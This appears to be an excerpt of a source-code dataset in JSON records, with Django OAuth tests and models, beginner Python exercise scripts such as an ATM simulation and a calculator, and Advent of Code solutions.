self.assertEquals(self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key,\n self.nonce_access_token.timestamp,\n 'abc', None, self.nonce_access_token.access_token),\n (self.clientcredentials.key,\n self.nonce_access_token.timestamp,\n 'abc', self.nonce_access_token.access_token))\n self.assertNotEquals(self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key,\n self.nonce_access_token.timestamp,\n 'abc', None,\n self.nonce_access_token.access_token),\n (self.clientcredentials.key,\n self.nonce_access_token.timestamp,\n 'abc', None))\n #Incorrect client key\n self.assertFalse(self.oauthserver.validate_timestamp_and_nonce(\n 'm7UQ0_n8M0vUNmdwCgQ4kMCRAfO5A7l6pN4QEOePAE4=',\n self.nonce_access_token.timestamp,\n self.nonce_access_token.nonce,\n None, self.nonce_access_token.access_token))\n\n def test_validate_client_key(self):\n self.assertEquals(\n self.oauthserver.validate_client_key(self.clientcredentials.key),\n self.clientcredentials.key)\n self.assertFalse(self.oauthserver.validate_client_key('notavalidkey'))\n\n def test_validate_request_token(self):\n self.token = Token.objects.get(pk=1)\n self.assertTrue(\n self.oauthserver.validate_request_token(\n self.clientcredentials.key, self.token.key))\n self.assertFalse(\n self.oauthserver.validate_request_token(\n 'mdwCgQ4kMCRAfO5A7l6pN4QEOePAE4=', self.token.key))\n self.assertFalse(\n self.oauthserver.validate_request_token(\n self.clientcredentials.key, 'm7UQ0_n8M0vUNmd'))\n\n def test_validate_access_token(self):\n self.token = Token.objects.get(pk=2)\n self.assertTrue(\n self.oauthserver.validate_access_token(\n self.clientcredentials.key, self.token.key))\n self.assertFalse(\n self.oauthserver.validate_access_token(\n 'mdwCgQ4kMCRAfO5A7l6pN4QEOePAE4=', self.token.key))\n self.assertFalse(\n self.oauthserver.validate_access_token(\n self.clientcredentials.key, 'm7UQ0_n8M0vUNmd'))\n\n def test_validate_redirect_uri(self):\n self.assertTrue(\n self.oauthserver.validate_redirect_uri(\n self.clientcredentials.key,\n self.clientcredentials.callback))\n self.assertFalse(\n self.oauthserver.validate_redirect_uri(\n 'mdwCgQ4kMCRAfO5A7l6pN4QEOePAE4=',\n self.clientcredentials.callback))\n self.assertFalse(\n self.oauthserver.validate_redirect_uri(\n self.clientcredentials.key,\n 'http://www.example.com/ready'))\n\n def test_validate_realm(self):\n self.realm = Realm.objects.get(pk=2)\n self.assertEquals(\n self.oauthserver.validate_realm(\n self.clientcredentials.key,\n self.realm.access_token,\n None, self.realm.name),\n self.realm.name)\n self.realm = Realm.objects.get(pk=3)\n self.assertEquals(\n self.oauthserver.validate_realm(\n self.clientcredentials.key,\n self.realm.access_token,\n self.realm.url, None),\n self.realm.url)\n\n def test_validate_requested_realm(self):\n self.realm = Realm.objects.get(pk=1)\n self.assertEquals(\n self.oauthserver.validate_requested_realm(\n self.clientcredentials.key, self.realm.name),\n self.realm.name)\n self.assertFalse(\n self.oauthserver.validate_requested_realm(\n 'mdwCgQ4kMCRAfO5A7l6pN4QEOePAE4=', self.realm.name))\n self.assertFalse(\n self.oauthserver.validate_requested_realm(\n self.clientcredentials.key, 'wrong_realm_name'))\n\n# def test_validate_verifier(self):\n# self.token = Token.objects.get(pk=2)\n# self.assertEquals(\n# self.oauthserver.validate_verifier(\n# self.clientcredentials.key,\n# self.token.key,\n# 'dfg'),\n# 'dfg')\n\n def test_get_client_secret(self):\n self.assertEquals(\n self.oauthserver.get_client_secret(self.clientcredentials.key),\n self.clientcredentials.secret)\n self.assertFalse(\n self.oauthserver.get_client_secret('Vc_89DGdxcBShDhXGkDKJuc8='))\n\n def test_get_request_token_secret(self):\n self.token = Token.objects.get(pk=1)\n self.assertEquals(\n self.oauthserver.get_request_token_secret(\n self.clientcredentials.key, self.token.key),\n self.token.secret)\n self.assertFalse(\n self.oauthserver.get_request_token_secret(\n 'Vc_89DGdxcBShDhXGkDKJuc8=', self.token.key))\n self.assertFalse(\n self.oauthserver.get_request_token_secret(\n self.clientcredentials.key, 'QhYz2iCdGS8xYwUegfSUHF'))\n\n def test_get_access_token_secret(self):\n self.token = Token.objects.get(pk=2)\n self.assertEquals(self.oauthserver.get_request_token_secret(\n self.clientcredentials.key, self.token.key),\n self.token.secret)\n self.assertFalse(self.oauthserver.get_request_token_secret(\n 'Vc_89DGdxcBShDhXGkDKJuc8=', self.token.key))\n self.assertFalse(self.oauthserver.get_request_token_secret(\n self.clientcredentials.key, 'QhYz2iCdGS8xYwUegfSUHF'))\n\n#class TemporaryCredentialsRequestTest(TestCase):\n# fixtures = ['test_entries.json']\n#\n# def setUp(self):\n# super(TemporaryCredentialsRequestTest, self).setUp()\n#\n# # Credentials\n# self.username = 'testuser'\n# self.password = 'pass'\n# self.user = User.objects.create_user(\n# self.username,\n# '[email protected]',\n# self.password\n# )\n#\n# # Object to test on\n# self.clientcredentials = ClientCredential.objects.get(pk=1)\n#\n# # Nose setting for long diffs\n# self.maxDiff = None\n#\n# def testStuff(self):\n#\n# c = Client(\n# self.clientcredentials.key,\n# callback_uri=self.clientcredentials.callback\n# )\n#\n# uri, headers, body = c.sign(u'http://127.0.0.1:8001/initiate/')\n\n# #TODO nonce/timestamp/signature will change\n# self.assertEqual(\n# headers,\n# {\n# u'Authorization': u'OAuth oauth_nonce='\n# u'\"110880830699442379541341263567\",'\n# u'oauth_timestamp=\"1341263567\", oauth_version=\"1.0\",'\n# u'oauth_signature_method=\"HMAC-SHA1\",'\n# u'oauth_consumer_key=self.clientcredentials.key,'\n# u'oauth_callback=self.clientcredentials.callback,'\n# u'oauth_signature=\"1emEeMqMx1vgjKEwdwyrz57%2FyTE%3D\"',\n# }\n# )\n\n# s = OAuthServer()\n# self.assertTrue(s.verify_request(uri, body=body, headers=headers))\n\n# dc = DjClient()\n# response = dc.post(\n# '/oauth/initiate/',\n# HTTP_AUTHORIZATION=headers['Authorization']\n# )\n# print response.status_code\n# print response.content\n\n #c = Client()\n\n# response = c.post('/oauth/initiate/', {\n# 'realm': 'test',\n# 'oauth_consumer_key': self.client.key,\n# 'oauth_signature_method': 'HMAC-SHA1',\n# 'oauth_timestamp': now,\n# 'oauth_nonce': nonce,\n# 'oauth_callback': self.client.callback,\n# 'oauth_signature': 'sign',\n# 'oauth_version': '1.0',\n# }, Authorization='OAuth')\n#\n# print response.status_code\n# print response.content\n"
},
{
"alpha_fraction": 0.5911111235618591,
"alphanum_fraction": 0.6177777647972107,
"avg_line_length": 20.380952835083008,
"blob_id": "3f46731e17bc88fb16b2ea2cedffc79e283ad2eb",
"content_id": "c42064b286654d340332b810145514180f1780e5",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 450,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 21,
"path": "/docs/source/index.rst",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": ".. django-oauthlib documentation master file, created by\n sphinx-quickstart on Tue Sep 4 14:16:10 2012.\n You can adapt this file completely to your liking, but it should at least\n contain the root `toctree` directive.\n\nWelcome to django-oauthlib's documentation!\n===========================================\n\nContents:\n\n.. toctree::\n :maxdepth: 2\n\n\n\nIndices and tables\n==================\n\n* :ref:`genindex`\n* :ref:`modindex`\n* :ref:`search`\n\n"
},
{
"alpha_fraction": 0.6582809090614319,
"alphanum_fraction": 0.6758909821510315,
"avg_line_length": 28.44444465637207,
"blob_id": "0e711aa7cae5c012c808f10d03186c79c9cde984",
"content_id": "d88777404e13c28bfab8259a10c70017c676c8af",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2385,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 81,
"path": "/oauth/models.py",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "import base64\nimport os\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom django.forms.models import ModelForm\n\n\nclass Resource(models.Model):\n name = models.CharField(max_length=100)\n url = models.URLField()\n\n def __unicode__(self):\n return self.name\n\n\nclass ClientCredential(models.Model):\n key = models.CharField(max_length=30, blank=True)\n secret = models.CharField(max_length=30, blank=True)\n name = models.CharField(max_length=100)\n callback = models.URLField()\n user = models.ForeignKey(User)\n\n def __unicode__(self):\n return self.key\n\n def save(self, *args, **kwargs):\n if not self.key:\n self.key = base64.urlsafe_b64encode(os.urandom(30))\n if not self.secret:\n self.secret = User.objects.make_random_password(length=30)\n super(ClientCredential, self).save(*args, **kwargs)\n\n\nclass ClientCredentialForm(ModelForm):\n class Meta:\n model = ClientCredential\n fields = ('name', 'callback')\n\n\nclass Nonce(models.Model):\n nonce = models.CharField(max_length=30)\n timestamp = models.IntegerField()\n key = models.ForeignKey(ClientCredential)\n request_token = models.CharField(max_length=30, null=True)\n access_token = models.CharField(max_length=30, null=True)\n\n def __unicode__(self):\n return self.nonce\n\n\nclass TokenType(models.Model):\n token_type = models.CharField(max_length=10)\n\n def __unicode__(self):\n return self.token_type\n\n\nclass Token(models.Model):\n token_type = models.ForeignKey(TokenType)\n resource = models.ForeignKey(Resource)\n client_key = models.ForeignKey(ClientCredential)\n key = models.CharField(max_length=30, blank=True)\n secret = models.CharField(max_length=30, blank=True)\n timestamp = models.DateTimeField(auto_now_add=True)\n\n def save(self, *args, **kwargs):\n if not self.key:\n self.key = base64.urlsafe_b64encode(os.urandom(30))\n if not self.secret:\n self.secret = User.objects.make_random_password(length=30)\n super(Token, self).save(*args, **kwargs)\n\n\nclass Realm(models.Model):\n name = models.CharField(max_length=50)\n client_key = models.ForeignKey(ClientCredential)\n access_token = models.ForeignKey(Token, null=True)\n url = models.URLField(null=True)\n\n def __unicode__(self):\n return self.name\n"
},
{
"alpha_fraction": 0.6623376607894897,
"alphanum_fraction": 0.6623376607894897,
"avg_line_length": 33.22222137451172,
"blob_id": "1a3fb2e27a493507cbf817b21c924a7c53c4baea",
"content_id": "295c8323a4d5060a727c696ecc012e0842c71734",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 308,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 9,
"path": "/oauth/urls.py",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import patterns, url\n\nurlpatterns = patterns(\n '',\n url(r'^register/$', 'oauth.views.register'),\n url(r'^initiate/$', 'oauth.views.temporary_credentials_request'),\n url(r'^authorize/$', 'oauth.views.user_authorization'),\n url(r'^token/$', 'oauth.views.token_request'),\n)\n"
},
{
"alpha_fraction": 0.5785123705863953,
"alphanum_fraction": 0.71074378490448,
"avg_line_length": 19.16666603088379,
"blob_id": "3eb66981b3a44a068e30e25057571baac82f0427",
"content_id": "b5d248de5b8eb23d0bdfaad0dbe2c960d071bb28",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 121,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 6,
"path": "/requirements.txt",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "Django==1.5.0\npytz==2013b\nsouth==0.7.6\noauthlib==0.3.8\n#git+https://github.com/idan/oauthlib.git#egg=oauthlib\ntox==1.4.3\n"
}
] | 15 |
huangzhiyuan/python_learn
|
https://github.com/huangzhiyuan/python_learn
|
cf9560941460d46f90d551452a4714ccdb8b0460
|
c6c79b41b9b258ec32a0530afc5fc3678e352121
|
3ccaa12a566572697a4f1d493f441e3a6e537f63
|
refs/heads/master
| 2017-12-01T09:56:34.445471 | 2016-06-04T12:18:12 | 2016-06-04T12:18:12 | 60,399,493 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6363636255264282,
"alphanum_fraction": 0.6679035425186157,
"avg_line_length": 22.478260040283203,
"blob_id": "54e9fbf438f058299134c1c264a2f0b6948078e0",
"content_id": "3596e3d7e618afb06c38a42a2a716075e76c1ff1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 539,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 23,
"path": "/generateRandomCode.py",
"repo_name": "huangzhiyuan/python_learn",
"src_encoding": "UTF-8",
"text": "#!/bin/usr/python\r\rimport random\rimport sys\r\rdef generate_verificatin_code(len=6):\r\t'''notes: the words is from 0-9A-Za-z\r\tyou can also set the code_list = ['p','y','t']\r\tand so on'''\r\tcode_list = []\r\tfor i in range(10): #0-9\r\t\tcode_list.append(str(i))\r\tfor i in range(65,91): #A-Z\r\t\tcode_list.append(chr(i))\r\tfor i in range(97,123): #a-z \r\t\tcode_list.append(chr(i))\r\tmyslice = random.sample(code_list,len)\r\tverification_code = ''.join(myslice)\r\treturn verification_code\r\t\r\t\rcode = generate_verificatin_code(int(sys.argv[1]))\rprint code"
},
{
"alpha_fraction": 0.5014419555664062,
"alphanum_fraction": 0.515501081943512,
"avg_line_length": 32,
"blob_id": "14999589b6e618674d1d639c33eef8700cea2617",
"content_id": "ac02c809cbd43093f7c626604192615456a78fb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2774,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 84,
"path": "/atm.py",
"repo_name": "huangzhiyuan/python_learn",
"src_encoding": "UTF-8",
"text": "#!/bin/usr/python\r# -*- coding: UTF-8 -*-\rID = 999\rPASSWORD = 111\rMONEY = 10000\rID_ZHUAN = 123\rIS_GOON = 0\rWRONGTIME = 0\rprint \"welcome to use the blue machine of ATM\"\rwhile (IS_GOON == 0) :\r if WRONGTIME > 0 :\r print(\"input error,again\")\r print(\"input your card num\")\r id = int(input())\r print(\"input your card pass\")\r password = int(input())\r if id == ID and password == PASSWORD :\r IS_GOON = 1\r else :\r WRONGTIME += 1\r if WRONGTIME > 2 :\r print(\"the time your input error is three times,thanks for you using.\")\r break\rprint(\"---------------------------------------\")\rwhile IS_GOON == 1 :\r print(\"choose the num\")\r print(\"1.save\")\r print(\"2.withdow\")\r print(\"3.transfer\")\r print(\"4.balance inquiry\")\r print(\"5.change password\")\r print(\"---------------------------------------\")\r num_caozuo = int(input())\r if num_caozuo == 1 :\r print(\"input the mount you want save\")\r money = int(input())\r MONEY = MONEY + money\r print(\"seve success\")\r print(\"the balance is:\",MONEY)\r elif num_caozuo == 2 :\r print(\"input the mount you want withdow\")\r money = int(input())\r if money < MONEY :\r MONEY = MONEY - money\r print(\"withdow success\")\r print(\"the balance is:\",MONEY)\r else :\r print(\"withdow fail,the balance is insufficient\")\r elif num_caozuo == 3 :\r print(\"input the account id you want switch to:\")\r id_zhuan = int(input())\r if id_zhuan == ID_ZHUAN :\r print(\"input the mount you want switch to:\")\r money = int(input())\r if money < MONEY :\r print(\"transfer success\")\r else :\r print(\"the balance is insufficient\")\r else :\r print(\"the account is not exist\")\r elif num_caozuo == 4 :\r print(\"the balance is:\",MONEY)\r elif num_caozuo == 5 :\r print(\"input your old password\")\r password = int(input())\r if password == PASSWORD :\r print(\"input your new password\")\r password_new1 = int(input())\r print(\"input your new password again\")\r password_new2 = int(input())\r if password_new1 != password_new2 :\r print(\"twice time input is not same,cancel the change\")\r else :\r PASSWORD = password_new1\r print(\"change success\")\r else :\r print(\"the input password is error,cancel the change\")\r print(\"---------------------------------------\")\r print(\"is other operate? yes:0 no:1\")\r is_goon = int(input())\r if is_goon == IS_GOON :\r continue\r else :\r print(\"thanks for your using,bye.\")\r\t\t"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.7307692170143127,
"avg_line_length": 25.11111068725586,
"blob_id": "3da35e1b4d5d0c5966a84774a5fe3b8eec1f03c8",
"content_id": "28492756c81041d4f0cc33f84aa09cd1320273c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 438,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 9,
"path": "/fizzbuzz.py",
"repo_name": "huangzhiyuan/python_learn",
"src_encoding": "UTF-8",
"text": "#!/bin/usr/python\r'''\r前段时间Jeff Atwood 推广了一个简单的编程练习叫FizzBuzz,问题引用如下:\r写一个程序,打印数字1到100,3的倍数打印“Fizz”来替换这个数,5的倍数打印“Buzz”,\r对于既是3的倍数又是5的倍数的数字打印“FizzBuzz”。\r这里就是一个简短的,有意思的方法解决这个问题:\r'''\r\rfor x in range(101): print\"fizz\"[x%3*4::]+\"buzz\"[x%5*4::] or x"
},
{
"alpha_fraction": 0.7066115736961365,
"alphanum_fraction": 0.7066115736961365,
"avg_line_length": 19.16666603088379,
"blob_id": "091b8a7e081c231f2db8738b342ba7a5a2daa654",
"content_id": "c2c69b463cdafe35f75354523810ed4bc662536e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 242,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 12,
"path": "/getNmaeAndIp.py",
"repo_name": "huangzhiyuan/python_learn",
"src_encoding": "UTF-8",
"text": "#!usr/bin/python\r\rimport socket\r\r#get the host pc name\rmyname = socket.getfqdn(socket.gethostname()) \r\r#get the host ip\rmyaddr = socket.gethostbyname(myname)\r\rprint \"the name of your pc: %s \" % myname\rprint \"the ip of your pc : %s \" % myaddr\r"
},
{
"alpha_fraction": 0.48076921701431274,
"alphanum_fraction": 0.5256410241127014,
"avg_line_length": 14.699999809265137,
"blob_id": "db4820a8cd4f51a034042be80b9a42bf7cdfd56f",
"content_id": "17a508d8fa7701eea6fd0d7b88ab99464a93d879",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 156,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 10,
"path": "/reverse.py",
"repo_name": "huangzhiyuan/python_learn",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\r# -*- coding: UTF-8 -*-\r\rif __name__ == '__main__':\r ptr = [3,5,6,3,1,9]\r print ptr\r\tptr.reverse()\r\tprint ptr\r\tptr.sort()\r\tprint ptr"
},
{
"alpha_fraction": 0.4571428596973419,
"alphanum_fraction": 0.4928571283817291,
"avg_line_length": 13.448275566101074,
"blob_id": "855b1ec6f60bd98ca631e0a5fea2849682566f3f",
"content_id": "50cf2a9639a8242064e8389cb5446da3eccbb886",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 420,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 29,
"path": "/yuesefu.py",
"repo_name": "huangzhiyuan/python_learn",
"src_encoding": "UTF-8",
"text": "#!/bin/usr/python\r\rif __name__=='__main__':\r\tmount = int(raw_input(\"input the number:\"))\r\tcount = int(raw_input(\"input the count:\"))\r\t\r\tnum = []\r\tfor i in range(mount):\r\t\tnum.append(i+1)\r\t\r\tprint num\r\t\r\ti = 0\r\tk = 0\r\tm = 0\r\t\r\twhile m < mount-1:\r\t\tif num[i] != 0 : k += 1\r\t\tif k == count:\r\t\t\tprint num[i]\r\t\t\tnum[i] = 0\r\t\t\tk = 0\r\t\t\tm += 1\r\t\ti += 1\r\t\tif i == mount : i = 0\r\t\r\ti = 0\r\twhile num[i] == 0:i += 1\r\tprint num[i]\r\t"
},
{
"alpha_fraction": 0.39206966757774353,
"alphanum_fraction": 0.42041873931884766,
"avg_line_length": 20.439023971557617,
"blob_id": "7f166d0b378e1655c084e400cc041b9614ea14b9",
"content_id": "06b53781834cef5e73235d408370b360b6d8a8ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7191,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 246,
"path": "/mfc.py",
"repo_name": "huangzhiyuan/python_learn",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\n#!/usr/bin/python\n# Filename M_F_C.py\n'''请输入你所要进行的运算法的相应序号。\n--------------------------------------------------------\n--------------------------------------------------------\n 加法:1 乘方:5\n 减法:2 求模:6\n 乘法:3 一元一次方程:7\n 除法:4 一元二次方程:8\n--------------------------------------------------------\n--------------------------------------------------------\n 想得到最新版,可以联系我,\n 或者,你可以自己动手来改变\n 源码。如果你有更好地解决方案,\n 请记得发给我你修过的程序。还有\n 别忘了写注释。\n 这样~我也更好地学习python。\n 毕竟我还 是菜鸟!(*^__^*)\n 有些地方很愚蠢,请指教吧!\n 我的联系方式:\n 邮箱:[email protected]\n QQ:785731535\n 微信:Sardar_24\n---------------------------------------------------------\n---------------------------------------------------------\n'''\nprint __doc__\n\ndef addition(a,b=0,) :\n equel1 = a+b\n print equel1\n return\n\ndef subdaction(a,b=0) :\n equel2 = a-b\n print equel2\n return\n\ndef multiplication(a,b=1) : \n equel3 = a*b\n print equel3\n return\n\ndef division(a,b=1.) :\n a1 = float(a)\n b1 = float(b)\n equel4 = a1/b1\n print equel4 \n return\n\ndef power(a,b) : \n b1 = float(b)\n equel5 = a ** b1\n print equel5 \n return\n\ndef remainder(a,b) : \n a1 = float(a)\n b1 = float(b)\n equel6 = a1%b1\n print equel6\n return\n\ndef leiou(a,b) :\n a1 = float(a)\n b1 = float(b)\n x=(0-b1)/a1\n print x\n return\n\ndef qewou(a1,b1,c1):\n a = float(a1)\n b = float(b1)\n c = float(c1)\n delta = (b ** 2) -( 4*a*c)\n if delta < 0 :\n print '此一元二次方程无实数根!'\n elif delta == 0 :\n x = -b/(2*a)\n print '根为:',x\n else : \n import math \n root = math.sqrt(delta)\n x1 = (-b+root)/(2*a)\n x2 = (-b-root)/(2*a)\n print '根分别为',x1,'和',x2\n return\n\nenter =int(raw_input('请输入序号 : '))\n\nif enter == 1 : \n print '''\n 请仔细阅读下列使用说明!\n ---------------------说明-----------------------\n 请分别输入被加数和加数, \n 目前仅支持2个单独数字相加,\n 对此请谅解,我会尽快更新代码。\n\n -------------------------------------------------\n -------------------------------------------------\n ''' \n print '请根据上述说明,正确输入数字,请勿使用特殊符号 :'\n entera1 = raw_input('被加数:')\n entera2 = raw_input('加数:')\n aen1 = float(entera1)\n aen2 = float(entera2)\n addition(aen1,aen2)\n \nelif enter == 2 : \n print '''\n 请仔细阅读下列使用说明!\n ---------------------说明-----------------------\n 请分别输入被减数和减数, \n 目前仅支持2个单独数字相减,\n 对此请谅解,我会尽快更新代码。\n \n \n -------------------------------------------------\n -------------------------------------------------\n '''\n print '请根据上述说明,正确输入数字,请勿使用特殊符号 :'\n enters1 = raw_input('被减数:')\n enters2 = raw_input('减数:')\n sen1 = float(enters1)\n sen2 = float(enters2)\n subdaction(sen1,sen2)\n \n \nelif enter == 3 :\n print '''\n 请仔细阅读下列使用说明!\n ---------------------说明-----------------------\n 请分别输入两个乘数, \n 目前仅支持2个单独数字相相乘,\n 对此请谅解,我会尽快更新代码。\n \n \n -------------------------------------------------\n -------------------------------------------------\n ''' \n print '请根据上述说明,正确输入数字,请勿使用特殊符号 :'\n enterm1 = raw_input('乘数:')\n enterm2 = raw_input('乘数:')\n men1 = float(enterm1)\n men2 = float(enterm2)\n multiplication(men1,men2)\n \nelif enter == 4 :\n print '''\n 请仔细阅读下列使用说明!\n ---------------------说明-----------------------\n 请分别输入被除数和除数, \n 目前仅支持2个单独数字相除,\n 对此请谅解,我会尽快更新代码。\n \n \n -------------------------------------------------\n -------------------------------------------------\n ''' \n print '请根据上述说明,正确输入数字,请勿使用特殊符号 :'\n enterv1 = raw_input('被除数:')\n enterv2 = raw_input('除数:')\n ven1 = float(enterv1)\n ven2 = float(enterv2)\n division(ven1,ven2)\n \nelif enter == 5 :\n print '''\n 请仔细阅读下列使用说明!\n ---------------------说明-----------------------\n 请分别输入底数和指数\n \n -------------------------------------------------\n -------------------------------------------------\n ''' \n print '请根据上述说明,正确输入数字,请勿使用特殊符号 :'\n entermax1 = raw_input('底数:')\n entermax2 = raw_input('指数:')\n maxen1 = float(entermax1)\n power(maxen1,entermax2)\n \nelif enter == 6 :\n print '''\n 请仔细阅读下列使用说明!\n ---------------------说明-----------------------\n 求余数运算,请输入被除数和除数\n \n -------------------------------------------------\n -------------------------------------------------\n ''' \n print '请根据上述说明,正确输入数字,请勿使用特殊符号 :'\n entermod1 = raw_input('被除数:')\n entermod2 = raw_input('除数:')\n moden1 = float(entermod1)\n moden2 = float(entermod2)\n remainder(moden1,moden2)\n \n \nelif enter == 7 :\n print '''\n 请仔细阅读下列使用说明!\n ---------------------说明-----------------------\n 一元一次方程求解运算,你需要在\n 程序里输入相关数值前,请把一元\n 一次方程化为标准形式:\n ax+b=0(a不等于0)\n \n 然后分别输入未知数(x)的系数和\n 常数项。谢谢配合O(∩_∩)O\n -------------------------------------------------\n -------------------------------------------------\n ''' \n print '请根据上述说明,正确输入数字,请勿使用特殊符号 :'\n enterlei1 = raw_input('未知数系数:')\n enterlei2 = raw_input('常数项:')\n leien1 = float(enterlei1)\n leien2 = float(enterlei2)\n leiou(leien1,leien2)\n \nelif enter == 8 :\n print '''\n 请仔细阅读下列使用说明!\n ---------------------说明-----------------------\n 一元二次方程求解你需要在\n 程序里输入相关数值前,请把一元\n 二次方程化为标准形式:\n ax**2+bx+c=0(a不等于0,**表示次方)\n \n 然后分别输入二次项的系数,一次项\n 系数,常数项。谢谢配合O(∩_∩)O\n -------------------------------------------------\n -------------------------------------------------\n ''' \n print '请根据上述说明,正确输入数字,请勿使用特殊符号 :'\n enterqou1 = raw_input('二次项系数:')\n enterqou2 = raw_input('一次项系数:')\n enterqou3 = raw_input('常数项:')\n qouen1 = float(enterqou1)\n qouen2 = float(enterqou2)\n qouen3 = float(enterqou3)\n if qouen1 == 0 :\n print '输入错误!二次项系数不能为零!'\n \n else : \n qewou(qouen1,qouen2,qouen3)\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n \n \n \n \n \n \n\t\t\n\t\t\n \n \n \n \n \n \n \n \n \n "
}
] | 7 |
genesis32/adventofcode2020
|
https://github.com/genesis32/adventofcode2020
|
0ae20844ade41086d3ec972f02daf467a0bd05df
|
a8a8307222ad80062b51ce5b5c87f05edde3929e
|
7f6a4519939e759c5bc9906590281c9d124c530f
|
refs/heads/main
| 2023-01-23T03:45:10.504467 | 2020-12-12T03:55:19 | 2020-12-12T03:55:19 | 319,186,682 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4871794879436493,
"alphanum_fraction": 0.5117056965827942,
"avg_line_length": 18.933332443237305,
"blob_id": "875c55bffbdcea4fff833a8c4ff42af87544b815",
"content_id": "091a20cd9190b35318dfccf33479d21d1535c9d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 897,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 45,
"path": "/day10.py",
"repo_name": "genesis32/adventofcode2020",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nlines = [int(x.strip()) for x in open('day10.txt', 'r').readlines() if x != \"\"]\nlines.sort()\nlines.insert(0, 0)\nlines.append(lines[-1]+3)\n\nmemory = dict()\ndef valid_adapters(i, memory):\n if lines[i] == lines[-1]: \n return 1\n\n ret = 0\n for j in range(i+1, len(lines)):\n diff = lines[j] - lines[i]\n if diff > 3:\n break\n\n if i in memory:\n return memory[i]\n\n ret += valid_adapters(j, memory)\n\n memory[i] = ret\n return ret\n\ndef how_many_diff(): \n idx = 0 \n diff_one = 0 \n diff_three = 0\n while True:\n if idx >= len(lines)-1: break\n\n diff = lines[idx+1] - lines[idx]\n if diff == 1:\n diff_one += 1\n elif diff == 3:\n diff_three += 1\n\n idx += 1\n print(diff_one * diff_three)\n\n# how_many_diff()\nmemory = {}\nprint(valid_adapters(0, memory))\n"
},
{
"alpha_fraction": 0.5291222333908081,
"alphanum_fraction": 0.5586546063423157,
"avg_line_length": 28.7560977935791,
"blob_id": "682265691cffde3ce29561d2201ff7189509fad6",
"content_id": "d9f597dd4e447c8ab2ffa7a4c4f5737ea711356e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1219,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 41,
"path": "/day3.py",
"repo_name": "genesis32/adventofcode2020",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\ndef find_path(forest):\n xindex = 0\n num_trees = 0\n for row in forest:\n if xindex >= len(row):\n return -1\n\n if row[xindex] == '#':\n num_trees += 1\n xindex += 3\n\n return num_trees\n\ndef find_path2(forest, x_stride, y_stride):\n num_jumps_per_line = len(forest[0]) / x_stride\n num_dupes = int(len(forest)/num_jumps_per_line)+1\n forest = [f*num_dupes for f in forest]\n xindex = 0\n num_trees = 0\n for currenty in range(0, len(forest), y_stride):\n if xindex >= len(forest[currenty]):\n return -1\n\n if forest[currenty][xindex] == '#':\n\n num_trees += 1\n xindex += x_stride\n\n return num_trees\n\n# print(find_path([x.rstrip()*33 for x in open(\"day3.txt\", \"r\").readlines()]))\n\na = find_path2([x.rstrip() for x in open(\"day3.txt\", \"r\").readlines()], 1, 1)\nb = find_path2([x.rstrip() for x in open(\"day3.txt\", \"r\").readlines()], 3, 1)\nc = find_path2([x.rstrip() for x in open(\"day3.txt\", \"r\").readlines()], 5, 1)\nd = find_path2([x.rstrip() for x in open(\"day3.txt\", \"r\").readlines()], 7, 1)\ne = find_path2([x.rstrip() for x in open(\"day3.txt\", \"r\").readlines()], 1, 2)\n\nprint(a * b * c * d * e)"
},
{
"alpha_fraction": 0.4954954981803894,
"alphanum_fraction": 0.5090090036392212,
"avg_line_length": 34.560001373291016,
"blob_id": "ffebfc0c2309cad2b4189ebc15d482f531883e08",
